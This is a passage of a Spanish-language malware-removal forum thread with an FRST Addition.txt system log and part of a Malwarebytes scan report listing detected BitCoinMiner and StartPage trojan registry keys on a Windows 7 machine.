Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Task: {F83672FA-1D00-47DE-8FCA-C526017F8331} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(1): %windir%\system32\GWX\GWXUXWorker.exe -> /ScheduleUpgradeReminderTime
Task: {F83672FA-1D00-47DE-8FCA-C526017F8331} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\AdwCleaner_onReboot.job => C:\Users\Dango\Desktop\adwcleaner 3.5.1.2522_7.1.1.exe
Task: C:\Windows\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com

==================== Loaded Modules (Whitelisted) ==============

2018-04-08 09:56 - 2018-03-23 20:13 - 000544192 _____ () C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem\DisplayDriverAnalyzer\_DisplayDriverCrashAnalyzer64.dll
2016-03-03 19:37 - 2005-03-12 01:07 - 000087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2016-09-11 19:28 - 2014-10-24 14:16 - 000721263 _____ () C:\Windows\SysWOW64\WSCM64.dll
2017-08-28 19:43 - 2017-08-28 19:43 - 000230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-03-03 16:31 - 2016-03-03 16:31 - 000417944 _____ () C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
2016-03-03 16:30 - 2016-03-03 16:30 - 002546840 _____ () C:\Program Files\Nitro\Pro 10\Nitro_KissMetrics.dll
2015-06-25 07:53 - 2015-06-25 07:53 - 000699704 _____ () C:\Program Files (x86)\TuneUp Utilities 2014\avgrepliba.dll
2016-02-27 16:04 - 2008-02-13 16:54 - 000167936 _____ () C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe
2018-10-17 12:41 - 2018-09-12 11:35 - 002701064 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:nlsPreferences [386]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-03-24 00:17 - 2018-10-04 21:57 - 000001959 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1                   tonec.com
127.0.0.1                   www.tonec.com
127.0.0.1                   internetdownloadmanager.com
127.0.0.1                   star.tonec.com
127.0.0.1                   rev.dyxnet.com
127.0.0.1                   65.52.240.48
127.0.0.1                   activation.cloud.techsmith.com
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: Gaijin.Net Agent => "C:\Users\Dango\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"
MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Xvid => C:\Program Files (x86)\Xvid\CheckUpdate.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{6B5BDABC-7773-41B9-8955-AE765FE08BAA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{057477AD-1087-41BF-97E2-D3220B3AE2D5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E3574BC3-4820-4126-8D7E-2939BB474E41}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{DF8159C6-FF0B-413F-A3CF-778E033AF30E}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9CBF0E81-0345-4F66-9978-23875DA3EDD8}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{4F142A3B-CD06-4E42-9D44-C580D350B1AD}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{FCFE12FA-8EDC-46B1-BAD2-11ABA1A4F923}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1C765C25-9812-4400-AACE-0210DB141A33}] => (Allow) C:\Users\Dango\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6536DB78-A1AD-4D81-B2E7-1A33995E0CF1}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{81D58450-3795-456F-BCA1-878991FA05F5}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe
FirewallRules: [{86710BAF-8D93-4007-9499-CD5E340F0AC6}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{BC2ED155-2F50-42EB-AA8B-4C782688B4B8}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360.exe
FirewallRules: [{DDEA1ED2-7F3B-4B99-9B93-BE968E2A540E}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [{C4321D9E-CB58-4A51-97E8-0B75DA8E6E33}] => (Allow) C:\Program Files\SolidWorks Corp\SolidWorks\photoview\photoview360_cl.exe
FirewallRules: [TCP Query User{512E5352-F02E-43EA-A745-D9296B5E2017}C:\program files\solidworks corp\solidworks\photoview\photoview360.exe] => (Allow) C:\program files\solidworks corp\solidworks\photoview\photoview360.exe
FirewallRules: [UDP Query User{D5C6A217-47C6-4A23-A073-D899744E82A2}C:\program files\solidworks corp\solidworks\photoview\photoview360.exe] => (Allow) C:\program files\solidworks corp\solidworks\photoview\photoview360.exe
FirewallRules: [{E58293CE-4C95-425A-8206-E2D08D6038E5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7A4B8CB6-C2EE-4091-A811-4EE881D483B6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{16C774C8-2FEC-46C2-B0EE-7CEEE0AB7A88}] => (Allow) LPort=80
FirewallRules: [{67DBC6C8-09B2-436A-BCD7-751C4FDC90D3}] => (Allow) LPort=80
FirewallRules: [{777DD158-E959-400A-9C03-BBDEA6D153CB}] => (Allow) LPort=443
FirewallRules: [{0E83844E-DDC9-4B49-B676-4D2DE8391603}] => (Allow) LPort=443
FirewallRules: [{DFADA6A4-5B2C-4778-A022-44EB30537218}] => (Allow) LPort=20010
FirewallRules: [{C26B4224-C9E7-4A4F-9ECB-AD365B01745B}] => (Allow) LPort=20010
FirewallRules: [{6D7BDF79-E20E-46B2-9A24-1995A37E7A62}] => (Allow) LPort=3478
FirewallRules: [{C8EEC7A2-4CE1-427A-A7AD-7EEC8F45F7BC}] => (Allow) LPort=3478
FirewallRules: [{09B03742-8CC4-4AF2-8F31-52F6012A4C4A}] => (Allow) LPort=7850
FirewallRules: [{3A15AC9C-3B29-42BD-A342-91282BC3A169}] => (Allow) LPort=7850
FirewallRules: [{CB058C27-BDFD-405A-8361-EDF82716233E}] => (Allow) LPort=7852
FirewallRules: [{B4EFF182-F014-4CF4-84CE-A2CCD5F4F008}] => (Allow) LPort=7852
FirewallRules: [{183282B4-67AC-4F69-80A1-1AC2F2322D17}] => (Allow) LPort=7853
FirewallRules: [{861D5C0B-9114-4FB6-8311-C0871AC1CF49}] => (Allow) LPort=7853
FirewallRules: [{2254D696-E7AF-4AEC-B48C-B65419B82E9E}] => (Allow) LPort=27022
FirewallRules: [{DB7EEC9E-C651-40E5-A8F5-552BD7560E9A}] => (Allow) LPort=27022
FirewallRules: [{52D071BF-4F44-4856-910F-6712B128E4B5}] => (Allow) LPort=6881
FirewallRules: [{F9241EE8-E834-42A8-95DD-82708DD77E43}] => (Allow) LPort=6881
FirewallRules: [{446D0CE6-6A79-42F2-A9E6-FA5E8670E191}] => (Allow) LPort=33333
FirewallRules: [{7879B904-EFD7-4E68-834F-4419771CFB40}] => (Allow) LPort=33333
FirewallRules: [{015E8849-524F-4325-80F1-6BF73821F53F}] => (Allow) LPort=20443
FirewallRules: [{D4E2670E-1462-482A-B919-7A8322D14E52}] => (Allow) LPort=20443
FirewallRules: [{89099B0C-78D5-4565-9B63-618C234F7062}] => (Allow) LPort=8090
FirewallRules: [{3A58218F-4E87-4F73-8513-D0B136ACB96E}] => (Allow) LPort=8090
FirewallRules: [{7CF3C7C4-D432-4CE5-AA10-C50C5D3943B4}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4AC68811-DED5-4E27-B6AC-A543785FA681}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{FDE1341A-5D3A-4C2D-B898-947E36C55C08}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [UDP Query User{9469BBA3-F31E-4838-BAF0-ADEFD34C6720}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [TCP Query User{E62CADB6-0129-4089-B22F-C2FA9E8F0C65}F:\age\age2_x1\age2_x1.exe] => (Allow) F:\age\age2_x1\age2_x1.exe
FirewallRules: [UDP Query User{8F97F842-AD14-45AF-B078-DF2CFE2E4285}F:\age\age2_x1\age2_x1.exe] => (Allow) F:\age\age2_x1\age2_x1.exe
FirewallRules: [TCP Query User{964DFBC0-7EDD-431F-925E-718E6FC4FEFA}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{AA609A74-A701-4F43-A575-7AF60D05018B}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{E3F78A8B-DD76-42F8-B046-36033F7FB591}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{892561C0-9787-40CC-B91E-32436AE1986B}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{4109CAE3-3233-496A-B1A2-686AC06F8734}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{51B58BFD-9C9F-4989-AC17-B2664FCCE38E}C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [UDP Query User{FDBCD199-D39F-46F2-84AD-A6D183C2C0B0}C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [TCP Query User{53D139E5-5742-46EF-9DDD-739E7DF6D98B}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [UDP Query User{220F6B69-BA95-46A3-B972-C82A71F16ADA}C:\program files (x86)\voobly\voobly.exe] => (Allow) C:\program files (x86)\voobly\voobly.exe
FirewallRules: [{B465BAAA-D211-4CCA-BE0F-513DABB70662}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{E66638F6-2ED2-48F0-9F93-C81C0645B6F5}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{C3181DCA-1C11-40BB-8AB9-6D4149A21A5A}F:\age\age2_x1\age2_x1.exe] => (Block) F:\age\age2_x1\age2_x1.exe
FirewallRules: [UDP Query User{81A60C2E-5E50-4695-ACE2-E22920D1631B}F:\age\age2_x1\age2_x1.exe] => (Block) F:\age\age2_x1\age2_x1.exe
FirewallRules: [TCP Query User{0E057881-BEE2-4380-A20E-DEFF3A3B880B}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{47BA6D90-55D1-4FC9-8EB4-F6990BC777DA}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [{F215D715-9BF1-4BED-928E-20603D9B2FF8}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{BFB6590B-4A72-4B16-AFA7-0601C2EDCBE0}] => (Allow) C:\Users\Dango\noiSziUSYyUv.exe
FirewallRules: [{C369719A-B2AC-4D42-8D02-5D29026AF255}] => (Allow) C:\Program Files (x86)\Common Files\aOTSAwA.exe
FirewallRules: [{BCE9F6BF-7349-4D72-B279-66B1A32985F7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5F44FF4A-3C95-43AD-B910-040A4774D433}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E205F5F5-51C4-4B48-8F09-6865722C24CB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A11B09AB-67F3-41E6-B4EC-331635C1268A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DD140554-D26D-4AB6-A584-4016B0FCF935}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9E3FD079-59CC-41B5-B777-74D095B3F5F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{71727AAF-9251-4DBD-B36A-0609CE94CC1D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2D85C5DA-689E-45AE-ADD0-4D09C0942CFC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DCED2390-85D6-4798-8C70-35F2E00CA6B0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9665FB02-0AFA-49FB-A5B5-4305A79F1338}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E9E15AA3-7494-41C8-8EDC-FFA54F2F5E92}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6C62CF9F-65EA-422B-B3C7-797CE14D675F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AEBC6069-A1E2-43C6-8CA7-3FAE8C0D0EFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8549A6B5-187D-4F55-8CB9-5B9936E80879}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A77BEDE5-9F38-4FA0-8BAF-685C04CA2A0A}] => (Allow) C:\Windows\SysWOW64\tracert.exe
FirewallRules: [{53FBB0C6-FD6C-4FAB-A605-C9456F1DC171}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{008BB5AF-9F01-43BE-99C4-BED45FF129FF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4EB0AC3E-E142-46B6-9410-A852752D9FB5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{829C3500-1255-4F3B-8F0B-1591A42164AE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{848DA305-0B26-42EE-8A39-9DA00A1FEC28}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{DEB3A7AA-BDEC-42F2-B735-887B64DC05B6}] => (Allow) C:\Windows\SysWOW64\svchost.exe

==================== Restore Points =========================


==================== Faulty Device Manager Devices =============

Name: NetGroup Packet Filter Driver
Description: NetGroup Packet Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: npf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

#11
Application errors:
==================
Error: (10/18/2018 01:05:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (10/18/2018 01:05:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: AutoKMS.exe, versión: 2.4.9.0, marca de tiempo: 0x522118df
Nombre del módulo con errores: KERNELBASE.dll, versión: 6.1.7601.19135, marca de tiempo: 0x56a1c9ac
Código de excepción: 0xe0434352
Desplazamiento de errores: 0x000000000000965d
Id. del proceso con errores: 0x5fc
Hora de inicio de la aplicación con errores: 0x01d4670cf36b4257
Ruta de acceso de la aplicación con errores: C:\Windows\AutoKMS\AutoKMS.exe
Ruta de acceso del módulo con errores: C:\Windows\system32\KERNELBASE.dll
Id. del informe: 5f92a044-d300-11e8-8c9a-b778cc4e51b5

Error: (10/18/2018 01:05:03 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplicación: AutoKMS.exe
Versión de Framework: v4.0.30319
Descripción: el proceso terminó debido a una excepción no controlada.
Información de la excepción: System.Runtime.InteropServices.COMException
   en System.Runtime.InteropServices.Marshal.ThrowExceptionForHRInternal(Int32, IntPtr)
   en System.Management.ManagementObjectCollection+ManagementObjectEnumerator.MoveNext()
   en ..(System.String, System.String, System.String, .)
   en ...ctor()
   en ..(.)
   en ..()

Error: (10/18/2018 01:04:28 PM) (Source: MSSQL$TEW_SQLEXPRESS) (EventID: 9003) (User: )
Description: The log scan number (95:448:1) passed to log scan in database 'model' is not valid. This error may indicate data corruption or that the log file (.ldf) does not match the data file (.mdf). If this error occurred during replication, re-create the publication. Otherwise, restore from backup if the problem results in a failure during startup.

Error: (10/18/2018 01:03:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: mbamservice.exe, versión: 3.2.0.704, marca de tiempo: 0x5b9acf90
Nombre del módulo con errores: SelfProtectionSdk.dll, versión: 3.0.0.360, marca de tiempo: 0x5b995ba2
Código de excepción: 0x40000015
Desplazamiento de errores: 0x000000000014e2bf
Id. del proceso con errores: 0xcb4
Hora de inicio de la aplicación con errores: 0x01d466f8ab8de60e
Ruta de acceso de la aplicación con errores: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
Ruta de acceso del módulo con errores: C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
Id. del informe: 0eaaf98e-d300-11e8-b5d0-df8ef6e1b3b2

Error: (10/18/2018 12:32:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa explorer.exe, versión 6.1.7601.19135, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

Identificador de proceso: e18

Hora de inicio: 01d466fa42267f2c

Hora de finalización: 0

Ruta de acceso de la aplicación: C:\Windows\explorer.exe

Identificador de informe:

Error: (10/18/2018 10:39:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (10/18/2018 10:39:37 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: AutoKMS.exe, versión: 2.4.9.0, marca de tiempo: 0x522118df
Nombre del módulo con errores: KERNELBASE.dll, versión: 6.1.7601.19135, marca de tiempo: 0x56a1c9ac
Código de excepción: 0xe0434352
Desplazamiento de errores: 0x000000000000965d
Id. del proceso con errores: 0x5f8
Hora de inicio de la aplicación con errores: 0x01d466f893e22281
Ruta de acceso de la aplicación con errores: C:\Windows\AutoKMS\AutoKMS.exe
Ruta de acceso del módulo con errores: C:\Windows\system32\KERNELBASE.dll
Id. del informe: 049f06d6-d2ec-11e8-b5d0-df8ef6e1b3b2


System errors:
=============
Error: (10/18/2018 01:04:28 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio SQL Server (TEW_SQLEXPRESS) se cerró con el error específico de servicio %%3414.

Error: (10/18/2018 01:04:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio NetGroup Packet Filter Driver no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (10/18/2018 01:03:04 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: El servicio SolidWorks Electrical Collaborative Server informó de un estado actual 0 no válido.

Error: (10/18/2018 11:44:24 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (10/18/2018 10:38:48 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio SQL Server (TEW_SQLEXPRESS) se cerró con el error específico de servicio %%3414.

Error: (10/18/2018 10:38:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio NetGroup Packet Filter Driver no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (10/18/2018 10:37:06 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: El servicio SolidWorks Electrical Collaborative Server informó de un estado actual 0 no válido.

Error: (10/18/2018 10:34:24 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 27%
Total physical RAM: 8137.88 MB
Available physical RAM: 5886.48 MB
Total Virtual: 16273.96 MB
Available Virtual: 13727.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:148.9 GB) (Free:20.46 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:632 GB) (Free:5.22 GB) NTFS
Drive f: () (Fixed) (Total:150.51 GB) (Free:10.67 GB) NTFS
Drive g: () (Fixed) (Total:60 GB) (Free:18.4 GB) NTFS
Drive h: () (Fixed) (Total:110 GB) (Free:0.67 GB) NTFS
Drive i: () (Fixed) (Total:16.21 GB) (Free:13.14 GB) NTFS


==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 82FF4458)
Partition 1: (Active) - (Size=148.9 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=632 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=150.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 186.3 GB) (Disk ID: FDF5FDF5)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=110 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=16.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

The code tag thing isn't working for me.


#12

The code tag has to go at the start of the text, but on the line above, not next to the first line. Same at the end: it goes below the last line…

I've already fixed it, don't worry.

As soon as I've reviewed it properly, I'll post a reply.


#13

Malwarebytes blocked other threats while I was using the PC; here is the report:

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 19/10/18
Hora del análisis: 9:03
Archivo de registro: b1392eae-d3a7-11e8-8b04-000000000000.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.463
Versión del paquete de actualización: 1.0.7428
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: System

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Programador de tareas
Resultado: Completado
Objetos analizados: 312241
Amenazas detectadas: 20
Amenazas en cuarentena: 0
Tiempo transcurrido: 10 min, 37 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 9
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DA905C87-7E94-C064-9156-0FA60FF7E39B}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C10402EE-5A05-4161-AD27-A2192D3562CC}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C10402EE-5A05-4161-AD27-A2192D3562CC}, Sin acciones por parte del usuario, [6036], [-1],0.0.0
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{AD1685E2-7536-7AF3-A95D-3F7867585C73}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A87F6214-B479-4A28-BD0C-028D27A1F05C}, Sin acciones por parte del usuario, [14191], [555894],1.0.7428
